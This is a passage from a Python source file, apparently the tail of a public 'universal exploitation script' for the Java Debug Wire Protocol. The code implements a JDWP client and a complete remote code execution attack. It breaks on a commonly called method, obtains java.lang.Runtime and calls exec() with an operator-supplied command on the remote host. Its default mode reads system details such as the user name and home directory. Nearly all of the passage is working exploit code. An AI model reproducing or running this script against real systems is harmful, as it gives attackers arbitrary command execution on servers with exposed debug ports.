idsizes(self): 216 | self.socket.sendall( self.create_packet(IDSIZES_SIG) ) 217 | buf = self.read_reply() 218 | formats = [ ("I", "fieldIDSize"), ("I", "methodIDSize"), ("I", "objectIDSize"), 219 | ("I", "referenceTypeIDSize"), ("I", "frameIDSize") ] 220 | for entry in self.parse_entries(buf, formats, False): 221 | for name,value in entry.iteritems(): 222 | setattr(self, name, value) 223 | return 224 | 225 | def allthreads(self): 226 | try: 227 | getattr(self, "threads") 228 | except : 229 | self.socket.sendall( self.create_packet(ALLTHREADS_SIG) ) 230 | buf = self.read_reply() 231 | formats = [ (self.objectIDSize, "threadId")] 232 | self.threads = self.parse_entries(buf, formats) 233 | finally: 234 | return self.threads 235 | 236 | def get_thread_by_name(self, name): 237 | self.allthreads() 238 | for t in self.threads: 239 | threadId = self.format(self.objectIDSize, t["threadId"]) 240 | self.socket.sendall( self.create_packet(THREADNAME_SIG, data=threadId) ) 241 | buf = self.read_reply() 242 | if len(buf) and name == self.readstring(buf): 243 | return t 244 | return None 245 | 246 | def allclasses(self): 247 | try: 248 | getattr(self, "classes") 249 | except: 250 | self.socket.sendall( self.create_packet(ALLCLASSES_SIG) ) 251 | buf = self.read_reply() 252 | formats = [ ('C', "refTypeTag"), 253 | (self.referenceTypeIDSize, "refTypeId"), 254 | ('S', "signature"), 255 | ('I', "status")] 256 | self.classes = self.parse_entries(buf, formats) 257 | 258 | return self.classes 259 | 260 | def get_class_by_name(self, name): 261 | for entry in self.classes: 262 | if entry["signature"].lower() == name.lower() : 263 | return entry 264 | return None 265 | 266 | def get_methods(self, refTypeId): 267 | if not self.methods.has_key(refTypeId): 268 | refId = self.format(self.referenceTypeIDSize, refTypeId) 269 | self.socket.sendall( self.create_packet(METHODS_SIG, data=refId) ) 270 | buf = self.read_reply() 271 | formats = [ (self.methodIDSize, "methodId"), 272 | ('S', "name"), 273 | ('S', "signature"), 274 | ('I', "modBits")] 275 | self.methods[refTypeId] = self.parse_entries(buf, formats) 276 | return self.methods[refTypeId] 277 | 278 | def get_method_by_name(self, name): 279 | for refId in self.methods.keys(): 280 | for entry in self.methods[refId]: 281 | if entry["name"].lower() == name.lower() : 282 | return entry 283 | return None 284 | 285 | def getfields(self, refTypeId): 286 | if not self.fields.has_key( refTypeId ): 287 | refId = self.format(self.referenceTypeIDSize, refTypeId) 288 | self.socket.sendall( self.create_packet(FIELDS_SIG, data=refId) ) 289 | buf = self.read_reply() 290 | formats = [ (self.fieldIDSize, "fieldId"), 291 | ('S', "name"), 292 | ('S', "signature"), 293 | ('I', "modbits")] 294 | self.fields[refTypeId] = self.parse_entries(buf, formats) 295 | return self.fields[refTypeId] 296 | 297 | def getvalue(self, refTypeId, fieldId): 298 | data = self.format(self.referenceTypeIDSize, refTypeId) 299 | data+= struct.pack(">I", 1) 300 | data+= self.format(self.fieldIDSize, fieldId) 301 | self.socket.sendall( self.create_packet(GETVALUES_SIG, data=data) ) 302 | buf = self.read_reply() 303 | formats = [ ("Z", "value") ] 304 | field = self.parse_entries(buf, formats)[0] 305 | return field 306 | 307 | def createstring(self, data): 308 | buf = self.buildstring(data) 309 | self.socket.sendall( self.create_packet(CREATESTRING_SIG, data=buf) ) 310 | buf = self.read_reply() 311 | return self.parse_entries(buf, [(self.objectIDSize, "objId")], False) 312 | 313 | def buildstring(self, data): 314 | return struct.pack(">I", len(data)) + data 315 | 316 | def readstring(self, data): 317 | size = struct.unpack(">I", data[:4])[0] 318 | return data[4:4+size] 319 | 320 | def suspendvm(self): 321 | self.socket.sendall( self.create_packet( SUSPENDVM_SIG ) ) 322 | self.read_reply() 323 | return 324 | 325 | def resumevm(self): 326 | self.socket.sendall( self.create_packet( RESUMEVM_SIG ) ) 327 | self.read_reply() 328 | return 329 | 330 | def invokestatic(self, classId, threadId, methId, *args): 331 | data = self.format(self.referenceTypeIDSize, classId) 332 | data+= self.format(self.objectIDSize, threadId) 333 | data+= self.format(self.methodIDSize, methId) 334 | data+= struct.pack(">I", len(args)) 335 | for arg in args: 336 | data+= arg 337 | data+= struct.pack(">I", 0) 338 | 339 | self.socket.sendall( self.create_packet(INVOKESTATICMETHOD_SIG, data=data) ) 340 | buf = self.read_reply() 341 | return buf 342 | 343 | def invoke(self, objId, threadId, classId, methId, *args): 344 | data = self.format(self.objectIDSize, objId) 345 | data+= self.format(self.objectIDSize, threadId) 346 | data+= self.format(self.referenceTypeIDSize, classId) 347 | data+= self.format(self.methodIDSize, methId) 348 | data+= struct.pack(">I", len(args)) 349 | for arg in args: 350 | data+= arg 351 | data+= struct.pack(">I", 0) 352 | 353 | self.socket.sendall( self.create_packet(INVOKEMETHOD_SIG, data=data) ) 354 | buf = self.read_reply() 355 | return buf 356 | 357 | def solve_string(self, objId): 358 | self.socket.sendall( self.create_packet(STRINGVALUE_SIG, data=objId) ) 359 | buf = self.read_reply() 360 | if len(buf): 361 | return self.readstring(buf) 362 | else: 363 | return "" 364 | 365 | def query_thread(self, threadId, kind): 366 | data = self.format(self.objectIDSize, threadId) 367 | self.socket.sendall( self.create_packet(kind, data=data) ) 368 | buf = self.read_reply() 369 | return 370 | 371 | def suspend_thread(self, threadId): 372 | return self.query_thread(threadId, THREADSUSPEND_SIG) 373 | 374 | def status_thread(self, threadId): 375 | return self.query_thread(threadId, THREADSTATUS_SIG) 376 | 377 | def resume_thread(self, threadId): 378 | return self.query_thread(threadId, THREADRESUME_SIG) 379 | 380 | def send_event(self, eventCode, *args): 381 | data = "" 382 | data+= chr( eventCode ) 383 | data+= chr( SUSPEND_ALL ) 384 | data+= struct.pack(">I", len(args)) 385 | 386 | for kind, option in args: 387 | data+= chr( kind ) 388 | data+= option 389 | 390 | self.socket.sendall( self.create_packet(EVENTSET_SIG, data=data) ) 391 | buf = self.read_reply() 392 | return struct.unpack(">I", buf)[0] 393 | 394 | def clear_event(self, eventCode, rId): 395 | data = chr(eventCode) 396 | data+= struct.pack(">I", rId) 397 | self.socket.sendall( self.create_packet(EVENTCLEAR_SIG, data=data) ) 398 | self.read_reply() 399 | return 400 | 401 | def clear_events(self): 402 | self.socket.sendall( self.create_packet(EVENTCLEARALL_SIG) ) 403 | self.read_reply() 404 | return 405 | 406 | def wait_for_event(self): 407 | buf = self.read_reply() 408 | return buf 409 | 410 | def parse_event_breakpoint(self, buf, eventId): 411 | num = struct.unpack(">I", buf[2:6])[0] 412 | rId = struct.unpack(">I", buf[6:10])[0] 413 | if rId != eventId: 414 | return None 415 | tId = self.unformat(self.objectIDSize, buf[10:10+self.objectIDSize]) 416 | loc = -1 # don't care 417 | return rId, tId, loc 418 | 419 | 420 | 421 | def runtime_exec(jdwp, args): 422 | print ("[+] Targeting '%s:%d'" % (args.target, args.port)) 423 | print ("[+] Reading settings for '%s'" % jdwp.version) 424 | 425 | # 1. get Runtime class reference 426 | runtimeClass = jdwp.get_class_by_name("Ljava/lang/Runtime;") 427 | if runtimeClass is None: 428 | print ("[-] Cannot find class Runtime") 429 | return False 430 | print ("[+] Found Runtime class: id=%x" % runtimeClass["refTypeId"]) 431 | 432 | # 2. get getRuntime() meth reference 433 | jdwp.get_methods(runtimeClass["refTypeId"]) 434 | getRuntimeMeth = jdwp.get_method_by_name("getRuntime") 435 | if getRuntimeMeth is None: 436 | print ("[-] Cannot find method Runtime.getRuntime()") 437 | return False 438 | print ("[+] Found Runtime.getRuntime(): id=%x" % getRuntimeMeth["methodId"]) 439 | 440 | # 3. setup breakpoint on frequently called method 441 | c = jdwp.get_class_by_name( args.break_on_class ) 442 | if c is None: 443 | print("[-] Could not access class '%s'" % args.break_on_class) 444 | print("[-] It is possible that this class is not used by application") 445 | print("[-] Test with another one with option `--break-on`") 446 | return False 447 | 448 | jdwp.get_methods( c["refTypeId"] ) 449 | m = jdwp.get_method_by_name( args.break_on_method ) 450 | if m is None: 451 | print("[-] Could not access method '%s'" % args.break_on) 452 | return False 453 | 454 | loc = chr( TYPE_CLASS ) 455 | loc+= jdwp.format( jdwp.referenceTypeIDSize, c["refTypeId"] ) 456 | loc+= jdwp.format( jdwp.methodIDSize, m["methodId"] ) 457 | loc+= struct.pack(">II", 0, 0) 458 | data = [ (MODKIND_LOCATIONONLY, loc), ] 459 | rId = jdwp.send_event( EVENT_BREAKPOINT, *data ) 460 | print ("[+] Created break event id=%x" % rId) 461 | 462 | # 4. resume vm and wait for event 463 | jdwp.resumevm() 464 | 465 | print ("[+] Waiting for an event on '%s'" % args.break_on) 466 | while True: 467 | buf = jdwp.wait_for_event() 468 | ret = jdwp.parse_event_breakpoint(buf, rId) 469 | if ret is not None: 470 | break 471 | 472 | rId, tId, loc = ret 473 | print ("[+] Received matching event from thread %#x" % tId) 474 | 475 | jdwp.clear_event(EVENT_BREAKPOINT, rId) 476 | 477 | # 5. Now we can execute any code 478 | if args.cmd: 479 | runtime_exec_payload(jdwp, tId, runtimeClass["refTypeId"], getRuntimeMeth["methodId"], args.cmd) 480 | else: 481 | # by default, only prints out few system properties 482 | runtime_exec_info(jdwp, tId) 483 | 484 | jdwp.resumevm() 485 | 486 | print ("[!] Command successfully executed") 487 | 488 | return True 489 | 490 | 491 | def runtime_exec_info(jdwp, threadId): 492 | # 493 | # This function calls java.lang.System.getProperties() and 494 | # displays OS properties (non-intrusive) 495 | # 496 | properties = {"os.name": "Operating System", 497 | "java.class.path": "ClassPath", 498 | "user.name": "User name", 499 | "user.home": "User home directory" 500 | } 501 | 502 | systemClass = jdwp.get_class_by_name("Ljava/lang/System;") 503 | if systemClass is None: 504 | print ("[-] Cannot find class java.lang.System") 505 | return False 506 | 507 | jdwp.get_methods(systemClass["refTypeId"]) 508 | getPropertyMeth = jdwp.get_method_by_name("getProperty") 509 | if getPropertyMeth is None: 510 | print ("[-] Cannot find method System.getProperty()") 511 | return False 512 | 513 | for propStr, propDesc in properties.iteritems(): 514 | propObjIds = jdwp.createstring(propStr) 515 | if len(propObjIds) == 0: 516 | print ("[-] Failed to allocate command") 517 | return False 518 | propObjId = propObjIds[0]["objId"] 519 | 520 | data = [ chr(TAG_OBJECT) + jdwp.format(jdwp.objectIDSize, propObjId), ] 521 | buf = jdwp.invokestatic(systemClass["refTypeId"], 522 | threadId, 523 | getPropertyMeth["methodId"], 524 | *data) 525 | if buf[0] != chr(TAG_STRING): 526 | print ("[-] Unexpected returned type: expecting String") 527 | return False 528 | 529 | retId = jdwp.unformat(jdwp.objectIDSize, buf[1:1+jdwp.objectIDSize]) 530 | res = cli.solve_string(jdwp.format(jdwp.objectIDSize, retId)) 531 | print ("[+] Found %s '%s'" % (propDesc, res)) 532 | 533 | 534 | return True 535 | 536 | 537 | def runtime_exec_payload(jdwp, threadId, runtimeClassId, getRuntimeMethId, command): 538 | # 539 | # This function will invoke command as a payload, which will be running 540 | # with JVM privilege on host (intrusive). 541 | # 542 | print ("[+] Selected payload '%s'" % command) 543 | 544 | # 1. allocating string containing our command to exec() 545 | cmdObjIds = jdwp.createstring( command ) 546 | if len(cmdObjIds) == 0: 547 | print ("[-] Failed to allocate command") 548 | return False 549 | cmdObjId = cmdObjIds[0]["objId"] 550 | print ("[+] Command string object created id:%x" % cmdObjId) 551 | 552 | # 2. use context to get Runtime object 553 | buf = jdwp.invokestatic(runtimeClassId, threadId, getRuntimeMethId) 554 | if buf[0] != chr(TAG_OBJECT): 555 | print ("[-] Unexpected returned type: expecting Object") 556 | return False 557 | rt = jdwp.unformat(jdwp.objectIDSize, buf[1:1+jdwp.objectIDSize]) 558 | 559 | if rt is None: 560 | print "[-] Failed to invoke Runtime.getRuntime()" 561 | return False 562 | print ("[+] Runtime.getRuntime() returned context id:%#x" % rt) 563 | 564 | # 3. find exec() method 565 | execMeth = jdwp.get_method_by_name("exec") 566 | if execMeth is None: 567 | print ("[-] Cannot find method Runtime.exec()") 568 | return False 569 | print ("[+] found Runtime.exec(): id=%x" % execMeth["methodId"]) 570 | 571 | # 4. call exec() in this context with the alloc-ed string 572 | data = [ chr(TAG_OBJECT) + jdwp.format(jdwp.objectIDSize, cmdObjId) ] 573 | buf = jdwp.invoke(rt, threadId, runtimeClassId, execMeth["methodId"], *data) 574 | if buf[0] != chr(TAG_OBJECT): 575 | print ("[-] Unexpected returned type: expecting Object") 576 | return False 577 | 578 | retId = jdwp.unformat(jdwp.objectIDSize, buf[1:1+jdwp.objectIDSize]) 579 | print ("[+] Runtime.exec() successful, retId=%x" % retId) 580 | 581 | return True 582 | 583 | 584 | def str2fqclass(s): 585 | i = s.rfind('.') 586 | if i == -1: 587 | print("Cannot parse path") 588 | exit(1) 589 | 590 | method = s[i:][1:] 591 | classname = 'L' + s[:i].replace('.', '/') + ';' 592 | return classname, method 593 | 594 | 595 | if __name__ == "__main__": 596 | 597 | parser = argparse.ArgumentParser(description="Universal exploitation script for JDWP by @_hugsy_", 598 | formatter_class=argparse.ArgumentDefaultsHelpFormatter ) 599 | 600 | parser.add_argument("-t", "--target", type=str, metavar="IP", help="Remote target IP", required=True) 601 | parser.add_argument("-p", "--port", type=int, metavar="PORT", default=8000, help="Remote target port") 602 | 603 | parser.add_argument("--break-on", dest="break_on", type=str, metavar="JAVA_METHOD", 604 | default="java.net.ServerSocket.accept", help="Specify full path to method to break on") 605 | parser.add_argument("--cmd", dest="cmd", type=str, metavar="COMMAND", 606 | help="Specify full path to method to break on") 607 | 608 | args = parser.parse_args() 609 | 610 | classname, meth = str2fqclass(args.break_on) 611 | setattr(args, "break_on_class", classname) 612 | setattr(args, "break_on_method", meth) 613 | 614 | retcode = 0 615 | 616 | try: 617 | cli = JDWPClient(args.target, args.port) 618 | cli.start() 619 | 620 | if runtime_exec(cli, args) == False: 621 | print ("[-] Exploit failed") 622 | retcode = 1 623 | 624 | except KeyboardInterrupt: 625 | pass 626 | 627 | except Exception, e: 628 | print ("[-] Exception: %s" % e) 629 | retcode = 1 630 | 631 | finally: 632 | cli.leave() 633 | 634 | exit(retcode) 635 | --------------------------------------------------------------------------------